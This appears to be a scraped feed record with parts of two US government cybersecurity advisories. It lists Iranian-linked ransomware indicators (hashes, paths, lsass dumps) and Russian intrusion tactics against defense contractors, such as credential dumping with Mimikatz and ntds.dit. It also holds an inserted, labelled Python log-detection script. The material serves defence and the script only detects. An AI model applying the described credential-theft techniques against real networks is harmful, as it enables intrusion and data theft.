\n\nC:\\Windows\\Temp\\task_update[.]exe \n \nMD5:\n\n| \n\ncacb64bdf648444e66c82f5ce61caf4b \n \nSHA-1:\n\n| \n\n3a6431169073d61748829c31a9da29123dd61da8 \n \nSHA-256:\n\n| \n\n12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a \n \nFilename:\n\n| \n\nTask[.]exe \n \nMD5:\n\n| \n\n5b646edb1deb6396082b214a1d93691b \n \nSHA-1:\n\n| \n\n763ca462b2e9821697e63aa48a1734b10d3765ee \n \nSHA-256:\n\n| \n\n17e95ecc7fedcf03c4a5e97317cfac166b337288562db0095ccd24243a93592f \n \nFilename:\n\n| \n\ndllhost[.]exe \n \nPath:\n\n| \n\nC:\\Windows\\dllhost[.]exe \n \nMD5:\n\n| \n\n0f8b592126cc2be0e9967d21c40806bc\n\n| \n\n9a3703f9c532ae2ec3025840fa449d4e \n \nSHA-1:\n\n| \n\n3da45558d8098eb41ed7db5115af5a2c6 1c543af\n\n| \n\n8ece87086e8b5aba0d1cc4ec3804bf74e 0b45bee \n \nSHA-256:\n\n| \n\n724d54971c0bba8ff32aeb6044d3b3fd57 1b13a4c19cada015ea4bcab30cae26\n\n| \n\n1604e69d17c0f26182a3e3ff65694a4945\n\n0aafd56a7e8b21697a932409dfd81e \n \nFilename:\n\n| \n\nsvchost[.]exe \n \nPath:\n\n| \n\nC:\\Windows\\svchost[.]exe \n \nMD5:\n\n| \n\n68f58e442fba50b02130eedfc5fe4e5b\n\n| \n\n298d41f01009c6d6240bc2dc7b769205 \n \nSHA-1:\n\n| \n\n76dd6560782b13af3f44286483e157848\n\nefc0a4e\n\n| \n\n6ca62f4244994b5fbb8a46bdfe62aa1c95 8cebbd \n \nSHA-256:\n\n| \n\nb04b97e7431925097b3ca4841b894139 7b0b88796da512986327ff66426544ca\n\n| \n\n8aa3530540ba023fb29550643beb00c9c 29f81780056e02c5a0d02a1797b9cd9 \n \nFilename:\n\n| \n\nUser[.]exe \n \nPath:\n\n| \n\nC:\\Windows\\Temp\\user[.]exe \n \nMD5:\n\n| \n\nbd131ebfc44025a708575587afeebbf3\n\n| \n\nf0be699c8aafc41b25a8fc0974cc4582 \n \nSHA-1:\n\n| \n\n8b23b14d8ec4712734a5f6261aed40942 c9e0f68\n\n| \n\n6bae2d45bbd8c4b0a59ba08892692fe86 e596154 \n \nSHA-256:\n\n| \n\nb8a472f219658a28556bab4d6d109fdf3 433b5233a765084c70214c973becbbd\n\n| \n\n7b5fbbd90eab5bee6f3c25aa3c2762104 e219f96501ad6a4463e25e6001eb00b \n \nFilename:\n\n| \n\nSetup[.]bat \n \n---|--- \n \nPath:\n\n| \n\nC:\\Users\\DefaultAccount\\Desktop\\New folder\\setup[.]bat \n 
\nMD5:\n\n| \n\n7fdc2d007ef0c1946f1f637b87f81590 \n \nFilename:\n\n| \n\nSsasl[.]pmd \n \nPath:\n\n| \n\nC:\\Windows\\Temp\\ssasl[.]pmd \n \nFilename:\n\n| \n\nSsasl[.]zip \n \nPath:\n\n| \n\nC:\\Windows\\Temp\\ssasl[.]zip \n \nFilename:\n\n| \n\nnetscanold[.]exe \n \nPath:\n\n| \n\nC:\\Users\\DefaultAccount\\Desktop\\netscanold\\netscanold[.]exe \n \nFilename:\n\n| \n\nscan[.]csv \n \nPath:\n\n| \n\nC:\\Users\\DefaultAccount\\Desktop\\scan[.]csv \n \nFilename:\n\n| \n\nlsass[.]dmp \n \nPath:\n\n| \n\nC:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\lsass[.]dmp \n \nFilename:\n\n| \n\nlsass[.]zip \n \nPath:\n\n| \n\nC:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\lsass[.]zip \n \n** **\n\n### **APPENDIX B: MITRE ATT&CK TACTICS AND TECHNIQUES**\n\nTable 2 identifies MITRE ATT&CK Tactics and techniques observed in this activity.\n\n_Table 2: Observed Tactics and Techniques_\n\nTactic\n\n| \n\nTechnique \n \n---|--- \n \nResource Development []TA0042](<https://attack.mitre.org/versions/v11/tactics/TA0042>)]\n\n| \n\nObtain Capabilities: Malware [[T1588.001](<https://attack.mitre.org/versions/v11/techniques/T1588/001>)] \n \nObtain Capabilities: Tool [[T1588.002](<https://attack.mitre.org/versions/v11/techniques/T1588/002>)] \n \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v11/tactics/TA0001/>)]\n\n| \n\nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)] \n \nExecution [[TA0002](<https://attack.mitre.org/versions/v11/tactics/TA0002>)]\n\n| \n\nScheduled Task/Job: Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v11/techniques/T1053/005>)] \n \nPersistence [[TA0003](<https://attack.mitre.org/versions/v11/tactics/TA0003>)]\n\n| \n\nCreate Account: Local Account [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>)] \n \nCreate Account: Domain Account [[T1136.002](<https://attack.mitre.org/versions/v11/techniques/T1136/002>)] \n \nPrivilege Escalation 
[[TA0004](<https://attack.mitre.org/versions/v11/tactics/TA0004>)]\n\n| \n \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v11/tactics/TA0006>)]\n\n| \n \nCollection [[TA0009](<https://attack.mitre.org/versions/v11/tactics/TA0009>)]\n\n| \n\nArchive Collected Data: Archive via Utility [[T1560.001](<https://attack.mitre.org/versions/v11/techniques/T1560/001>)] \n \nExfiltration [[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)]\n\n| \n \nImpact [[TA0040](<https://attack.mitre.org/versions/v11/tactics/TA0040>)]\n\n| \n\nData Encrypted for Impact [[T1486](<https://attack.mitre.org/versions/v11/techniques/T1486>)] \n \n### Revisions\n\nSeptember 14, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-14T12:00:00", "type": "ics", "title": "Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31196", "CVE-2021-31206", 
"CVE-2021-31207", "CVE-2021-33766", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105", "CVE-2023-26360"], "modified": "2022-09-14T12:00:00", "id": "AA22-257A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-257a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T15:49:48", "description": "### Summary\n\n_Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:_ \n\u2022 Enforce multifactor authentication. \n\u2022 Enforce strong, unique passwords. \n\u2022 Enable M365** **Unified Audit Logs. \n\u2022 Implement** **endpoint detection and response tools.\n\nFrom at least January 2020, through February 2022, the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA) have observed regular targeting of U.S. cleared defense contractors (CDCs) by Russian state-sponsored cyber actors. The actors have targeted both large and small CDCs and subcontractors with varying levels of cybersecurity protocols and resources. These CDCs support contracts for the U.S. Department of Defense (DoD) and Intelligence Community in the following areas:\n\n * Command, control, communications, and combat systems;\n * Intelligence, surveillance, reconnaissance, and targeting;\n * Weapons and missile development;\n * Vehicle and aircraft design; and\n * Software development, data analytics, computers, and logistics. \n\nHistorically, Russian state-sponsored cyber actors have used common but effective tactics to gain access to target networks, including spearphishing, credential harvesting, brute force/password spray techniques, and known vulnerability exploitation against accounts and networks with weak security. 
These actors take advantage of simple passwords, unpatched systems, and unsuspecting employees to gain initial access before moving laterally through the network to establish persistence and exfiltrate data.

In many attempted compromises, these actors have employed similar tactics to gain access to enterprise and cloud networks, prioritizing their efforts against the widely used Microsoft 365 (M365) environment. The actors often maintain persistence by using legitimate credentials and a variety of malware when exfiltrating emails and data.

These continued intrusions have enabled the actors to acquire sensitive, unclassified information, as well as CDC-proprietary and export-controlled technology. The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology. By acquiring proprietary internal documents and email communications, adversaries may be able to adjust their own military plans and priorities, hasten technological development efforts, inform foreign policymakers of U.S. intentions, and target potential sources for recruitment. Given the sensitivity of information widely available on unclassified CDC networks, the FBI, NSA, and CISA anticipate that Russian state-sponsored cyber actors will continue to target CDCs for U.S. defense information in the near future. These agencies encourage all CDCs to apply the recommended mitigations in this advisory, regardless of evidence of compromise.

For additional information on Russian state-sponsored cyber activity, see CISA's webpage, [Russia Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/russia>).

### Threat Details

#### **Targeted Industries and Assessed Motive**

Russian state-sponsored cyber actors have targeted U.S. CDCs from at least January 2020, through February 2022. The actors leverage access to CDC networks to obtain sensitive data about U.S. defense and intelligence programs and capabilities. Compromised entities have included CDCs supporting the U.S. Army, U.S. Air Force, U.S. Navy, U.S. Space Force, and DoD and Intelligence programs.

During this two-year period, these actors have maintained persistent access to multiple CDC networks, in some cases for at least six months. In instances when the actors have successfully obtained access, the FBI, NSA, and CISA have noted regular and recurring exfiltration of emails and data. For example, during a compromise in 2021, threat actors exfiltrated hundreds of documents related to the company’s products, relationships with other countries, and internal personnel and legal matters.

Through these intrusions, the threat actors have acquired unclassified CDC-proprietary and export-controlled information. This theft has granted the actors significant insight into U.S. weapons platforms development and deployment timelines, plans for communications infrastructure, and specific technologies employed by the U.S. government and military. Although many contract awards and descriptions are publicly accessible, program developments and internal company communications remain sensitive. Unclassified emails among employees or with government customers often contain proprietary details about technological and scientific research, in addition to program updates and funding statuses. See figures 1 and 2 for information on targeted customers, industries, and information.

_Figure 1. Targeted Industries_

_Figure 2. Exfiltrated Information_

#### **Threat Actor Activity**

_**Note:** This advisory uses the MITRE ATT&CK® for Enterprise framework, version 10. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v10/techniques/enterprise/>) for all referenced threat actor tactics and techniques. See the Tactics, Techniques, and Procedures (TTPs) section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques._

##### _**Initial Access**_

Russian state-sponsored cyber actors use brute force methods, spearphishing, harvested credentials, and known vulnerabilities to gain initial access to CDC networks.

 * Threat actors use brute force techniques [[T1110](<https://attack.mitre.org/versions/v10/techniques/T1110>)] to identify valid account credentials [[T1589.001](<https://attack.mitre.org/versions/v10/techniques/T1589/001/>)] for domain and M365 accounts. After obtaining domain credentials, the actors use them to gain initial access to the networks. _**Note:** For more information, see joint NSA-FBI-CISA Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)._
 * Threat actors send spearphishing emails with links to malicious domains [[T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>)] and use publicly available URL shortening services to mask the link [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)]. Embedding shortened URLs instead of actor-controlled malicious domains is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient, increasing the probability of a victim’s clicking on the link.
 * The threat actors use harvested credentials in conjunction with known vulnerabilities (for example, CVE-2020-0688 and CVE-2020-17144) on public-facing applications [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>), [T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)], such as virtual private networks (VPNs), to escalate privileges and gain remote code execution (RCE) on the exposed applications.[[1](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)] In addition, threat actors have exploited CVE-2018-13379 on FortiClient to obtain credentials to access networks.
 * As CDCs find and patch known vulnerabilities on their networks, the actors alter their tradecraft to seek new means of access. This activity requires that CDCs maintain constant vigilance for software vulnerabilities and out-of-date security configurations, especially in internet-facing systems.

##### _**Credential Access**_

After gaining access to networks, the threat actors map the Active Directory (AD) and connect to domain controllers, from which they exfiltrate credentials and export copies of the AD database `ntds.dit` [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]. In multiple instances, the threat actors have used Mimikatz to dump admin credentials from the domain controllers.

##### _**Collection**_

Using compromised M365 credentials, including global admin accounts, the threat actors can gain access to M365 resources, including SharePoint pages [[T1213.002](<https://attack.mitre.org/versions/v10/techniques/T1213/002/>)], user profiles, and user emails [[T1114.002](<https://attack.mitre.org/versions/v10/techniques/T1114/002/>)].

##### _**Command and Control**_

The threat actors routinely use virtual private servers (VPSs) as an encrypted proxy. The actors use VPSs, as well as small office and home office (SOHO) devices, as operational nodes to evade detection [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)].

##### _**Persistence**_

In multiple instances, the threat actors maintained persistent access for at least six months. Although the actors have used a variety of malware to maintain persistence, the FBI, NSA, and CISA have also observed intrusions that did not rely on malware or other persistence mechanisms. In these cases, it is likely the threat actors relied on possession of legitimate credentials for persistence [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)], enabling them to pivot to other accounts, as needed, to maintain access to the compromised environments.

#### **Tactics, Techniques, and Procedures**

The following table maps observed Russian state-sponsored cyber activity to the MITRE ATT&CK for Enterprise framework. Several of the techniques listed in the table are based on observed procedures in contextual order. Therefore, some of the tactics and techniques listed in their respective columns appear more than once. See Appendix A for a functional breakdown of TTPs. _**Note:** for specific countermeasures related to each ATT&CK technique, see the [Enterprise Mitigations](<https://attack.mitre.org/mitigations/>) section and [MITRE D3FEND](<https://d3fend.mitre.org/>)_™.
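The brute-force credential discovery, shared VPS egress and valid-account pivoting described in this section are what the Detection section of this advisory later tells defenders to hunt for in authentication logs: password spray, one IP used across many accounts, impossible travel, and unusual user agent strings. The Python script below is an added example, not code from the advisory or its authoring agencies; it runs those four checks over a constructed set of sign-in events. The event layout, the thresholds, and the per-event coordinates (which a real pipeline would obtain from a GeoIP lookup on the source IP) are assumptions made for the example.

```python
"""Log-based checks for the credential-abuse TTPs in this advisory (added example).

The events are a constructed sample in the shape a SIEM export might take. In a real
deployment they would come from domain-controller or M365 Unified Audit Log sign-in
records, and lat/lon would be added by a GeoIP lookup on the source IP (assumed here).
"""
from collections import defaultdict
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt

# Constructed sample: (timestamp, user, source_ip, result, user_agent, lat, lon).
# Documentation-range IPs; coordinates approximate Washington, DC and Frankfurt.
EVENTS = [
    # Password spray: one source fails against six accounts in five minutes.
    ("2022-02-01T08:00:00", "alice", "198.51.100.7", "fail", "Mozilla/5.0", 38.9, -77.0),
    ("2022-02-01T08:01:00", "bob", "198.51.100.7", "fail", "Mozilla/5.0", 38.9, -77.0),
    ("2022-02-01T08:02:00", "carol", "198.51.100.7", "fail", "Mozilla/5.0", 38.9, -77.0),
    ("2022-02-01T08:03:00", "dave", "198.51.100.7", "fail", "Mozilla/5.0", 38.9, -77.0),
    ("2022-02-01T08:04:00", "erin", "198.51.100.7", "fail", "Mozilla/5.0", 38.9, -77.0),
    ("2022-02-01T08:05:00", "frank", "198.51.100.7", "fail", "Mozilla/5.0", 38.9, -77.0),
    # One source (a VPS, say) logging in as three users, one with a scripted client.
    ("2022-02-01T08:30:00", "bob", "203.0.113.9", "success", "python-requests/2.27.1", 38.9, -77.0),
    ("2022-02-01T08:31:00", "carol", "203.0.113.9", "success", "Mozilla/5.0", 38.9, -77.0),
    ("2022-02-01T08:32:00", "dave", "203.0.113.9", "success", "Mozilla/5.0", 38.9, -77.0),
    # Impossible travel: alice in Washington, DC, then Frankfurt one hour later.
    ("2022-02-01T09:00:00", "alice", "192.0.2.10", "success", "Mozilla/5.0", 38.9, -77.0),
    ("2022-02-01T10:00:00", "alice", "192.0.2.77", "success", "Mozilla/5.0", 50.1, 8.7),
    # Benign noise: one mistyped password, and erin logging in twice from the same city.
    ("2022-02-01T09:05:00", "alice", "192.0.2.10", "fail", "Mozilla/5.0", 38.9, -77.0),
    ("2022-02-01T09:00:00", "erin", "203.0.113.20", "success", "Mozilla/5.0", 38.9, -77.0),
    ("2022-02-01T15:00:00", "erin", "203.0.113.21", "success", "Mozilla/5.0", 38.9, -77.0),
]


def parse_events(rows):
    """Turn raw tuples into dicts with a real datetime for sorting and arithmetic."""
    keys = ("ts", "user", "ip", "result", "ua", "lat", "lon")
    events = [dict(zip(keys, row)) for row in rows]
    for e in events:
        e["ts"] = datetime.fromisoformat(e["ts"])
    return events


def password_spray(events, window=timedelta(hours=1), min_accounts=5):
    """Source IPs whose failures touch >= min_accounts distinct users within `window`.

    A spray is few failures per account but many accounts per source, so the check
    counts distinct accounts inside a sliding time window, not raw attempts.
    """
    fails = defaultdict(list)
    for e in events:
        if e["result"] == "fail":
            fails[e["ip"]].append(e)
    flagged = {}
    for ip, evs in fails.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end, e in enumerate(evs):
            while e["ts"] - evs[start]["ts"] > window:  # slide the window forward
                start += 1
            users = {x["user"] for x in evs[start:end + 1]}
            if len(users) >= min_accounts:
                flagged[ip] = sorted(users)
    return flagged


def shared_ip_successes(events, min_accounts=3):
    """One source IP successfully authenticating as several different users."""
    users_by_ip = defaultdict(set)
    for e in events:
        if e["result"] == "success":
            users_by_ip[e["ip"]].add(e["user"])
    return {ip: sorted(u) for ip, u in users_by_ip.items() if len(u) >= min_accounts}


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def impossible_travel(events, max_speed_kmh=900.0):
    """Consecutive successful logins by one user that would need faster-than-airliner travel.

    Returns (user, earlier_ip, later_ip, km, km_per_hour). As the advisory notes, users who
    connect through a VPN before logging in can trigger this, so treat hits as leads.
    """
    by_user = defaultdict(list)
    for e in events:
        if e["result"] == "success":
            by_user[e["user"]].append(e)
    hits = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        for prev, cur in zip(evs, evs[1:]):
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            hours = (cur["ts"] - prev["ts"]).total_seconds() / 3600
            speed = km / hours if hours > 0 else float("inf")
            if km > 0 and speed > max_speed_kmh:
                hits.append((user, prev["ip"], cur["ip"], round(km), round(speed)))
    return hits


EXPECTED_UA_PREFIXES = ("Mozilla/", "Microsoft Office")  # assumed baseline for this environment


def unusual_user_agents(events, expected=EXPECTED_UA_PREFIXES):
    """Successful logins whose user agent falls outside the environment's normal client set."""
    return sorted({(e["user"], e["ua"]) for e in events
                   if e["result"] == "success" and not e["ua"].startswith(expected)})


if __name__ == "__main__":
    evs = parse_events(EVENTS)
    print("password spray:", password_spray(evs))
    print("shared source IP:", shared_ip_successes(evs))
    print("impossible travel:", impossible_travel(evs))
    print("unusual user agents:", unusual_user_agents(evs))
```

The thresholds are the tuning knobs: `min_accounts` for the spray and shared-IP checks should sit above the number of users that legitimately share an egress address (a proxy or VPN concentrator), and the speed limit in `impossible_travel` trades missed short hops against the VPN false positives the advisory warns about.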
_Table 1: Observed Tactics, Techniques, and Procedures (TTPs)_

Tactic | Technique | Procedure
---|---|---
**Reconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]**; **Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006/>)]** | Gather Victim Identity Information: Credentials [[T1589.001](<https://attack.mitre.org/versions/v10/techniques/T1589/001/>)]; Brute Force [[T1110](<https://attack.mitre.org/versions/v10/techniques/T1110/003/>)] | Threat actors used brute force to identify valid account credentials for domain and M365 accounts. After obtaining domain credentials, the actors used them to gain initial access.
**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]** | External Remote Services [[T1133](<https://attack.mitre.org/versions/v10/techniques/T1133>)] | Threat actors continue to research vulnerabilities in Fortinet’s FortiGate VPN devices, conducting brute force attacks and leveraging CVE-2018-13379 to gain credentials to access victim networks. [[2](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>)]
**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**; **Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]** | Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]; Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)] | Threat actors used credentials in conjunction with known vulnerabilities (CVE-2020-0688 and CVE-2020-17144) on public-facing applications, such as virtual private networks (VPNs), to escalate privileges and gain remote code execution (RCE) on the exposed applications. [[3](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)]
**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**; **Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v10/tactics/TA0005>)]** | Phishing: Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>)]; Obfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)] | Threat actors sent spearphishing emails using publicly available URL shortening services. Embedding shortened URLs instead of the actor-controlled malicious domain is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient and thereby increases the possibility that a victim clicks on the link.
**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**; **Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006/>)]** | OS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]; Valid Accounts: Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v10/techniques/T1078/002/>)] | Threat actors logged into a victim’s VPN server and connected to the domain controllers, from which they exfiltrated credentials and exported copies of the AD database `ntds.dit`.
**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**; **Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]**; **Collection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009/>)]** | Valid Accounts: Cloud Accounts [[T1078.004](<https://attack.mitre.org/versions/v10/techniques/T1078/004/>)]; Data from Information Repositories: SharePoint [[T1213.002](<https://attack.mitre.org/versions/v9/techniques/T1213/002/>)] | In one case, the actors used valid credentials of a global admin account within the M365 tenant to log into the administrative portal and change permissions of an existing enterprise application to give read access to all SharePoint pages in the environment, as well as tenant user profiles and email inboxes.
**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**; **Collection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009/>)]** | Valid Accounts: Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v10/techniques/T1078/002/>)]; Email Collection [[T1114](<https://attack.mitre.org/versions/v10/techniques/T1114>)] | In one case, the threat actors used legitimate credentials to exfiltrate emails from the victim's enterprise email system.
**Persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)]**; **Lateral Movement [[TA0008](<https://attack.mitre.org/versions/v10/tactics/TA0008>)]** | Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)] | Threat actors used valid accounts for persistence. After some victims reset passwords for individually compromised accounts, the actors pivoted to other accounts, as needed, to maintain access.
**Discovery [[TA0007](<https://attack.mitre.org/tactics/TA0007>)]** | File and Network Discovery [[T1083](<https://attack.mitre.org/versions/v10/techniques/T1083>)] | After gaining access to networks, the threat actors used BloodHound to map the Active Directory.
**Discovery [[TA0007](<https://attack.mitre.org/versions/v10/tactics/TA0007>)]** | Domain Trust Discovery [[T1482](<https://attack.mitre.org/versions/v10/techniques/T1482/>)] | Threat actors gathered information on domain trust relationships that were used to identify lateral movement opportunities.
**Command and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]** | Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)] | Threat actors used multiple disparate nodes, such as VPSs, to route traffic to the target.

### Detection

The FBI, NSA, and CISA urge all CDCs to investigate suspicious activity in their enterprise and cloud environments. _**Note:** for additional approaches on uncovering malicious cyber activity, see joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom._

#### **Detect Unusual Activity**

**Implement robust log collection and retention.** Robust logging is critical for detecting unusual activity. Without a centralized log collection and monitoring capability, organizations have limited ability to investigate incidents or detect the threat actor behavior described in this advisory.
Depending on the environment, tools and solutions include:

 * Cloud native solutions, such as cloud-native security incident and event management (SIEM) tools.
 * Third-party tools, such as Sparrow, to review Microsoft cloud environments and to detect unusual activity, service principals, and application activity. _**Note:** for guidance on using these and other detection tools, refer to CISA Cybersecurity Advisory [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)._

#### **Look for Evidence of Known TTPs**

 * **Look for behavioral evidence or network and host-based artifacts** from known TTPs associated with this activity. To detect password spray activity, review authentication logs for system and application login failures of valid accounts. Look for frequent, failed authentication attempts across multiple accounts.
 * To detect use of compromised credentials in combination with a VPS, follow the steps below:
   * **Review logs for suspicious “impossible logins,”** such as logins with changing usernames, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user’s geographic location.
   * **Look for one IP used for multiple accounts,** excluding expected logins.
   * **Search for “impossible travel,”** which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses in the time between logins). _**Note:** this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting to networks._
 * **Evaluate processes and program execution command-line arguments** that may indicate credential dumping, especially attempts to access or copy the `ntds.dit` file from a domain controller.
 * Identify suspicious privileged account use after resetting passwords or applying user account mitigations.
 * **Review logs for unusual activity** in typically dormant accounts.
 * **Look for unusual user agent strings,** such as strings not typically associated with normal user activity, which may indicate bot activity.

### Incident Response and Remediation

Organizations with evidence of compromise should assume full identity compromise and initiate a full identity reset.

 * **Reset passwords for all local accounts.** These accounts should include Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. It is essential to reset the password for the krbtgt account, as this account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. _**Note:** reset the krbtgt account twice and consecutively with a 10-hour waiting period between resets (i.e., perform the first krbtgt password reset, wait 10 hours, and then follow with a second krbtgt password reset). The krbtgt password resets may take a long time to propagate fully on large AD environments. Refer to Microsoft’s [AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>) guidance and automation script for additional information. [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)][[5](<https://github.com/microsoft/New-KrbtgtKeys.ps1>)]_
 * **Reset all domain user, admin, and service account passwords.**

_**Note:** for guidance on evicting advanced persistent threat (APT) actors from cloud and enterprise environments, refer to CISA Analysis Report [Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/Microsoft 365 (M365) Compromise](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a>). Although this guidance was drafted for federal agencies compromised by the Russian Foreign Intelligence Service (SVR) via the [SolarWinds Orion supply chain compromise](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>), the steps provided in the Eviction Phase are applicable for all organizations crafting eviction plans for suspected APT actors._

### Mitigations

The FBI, NSA, and CISA encourage all CDCs, with or without evidence of compromise, to apply the following mitigations to reduce the risk of compromise by this threat actor. While these mitigations are not intended to be all-encompassing, they address common TTPs observed in these intrusions and will help to mitigate common malicious activity.

#### **Implement Credential Hardening**

##### **_Enable Multifactor Authentication_**

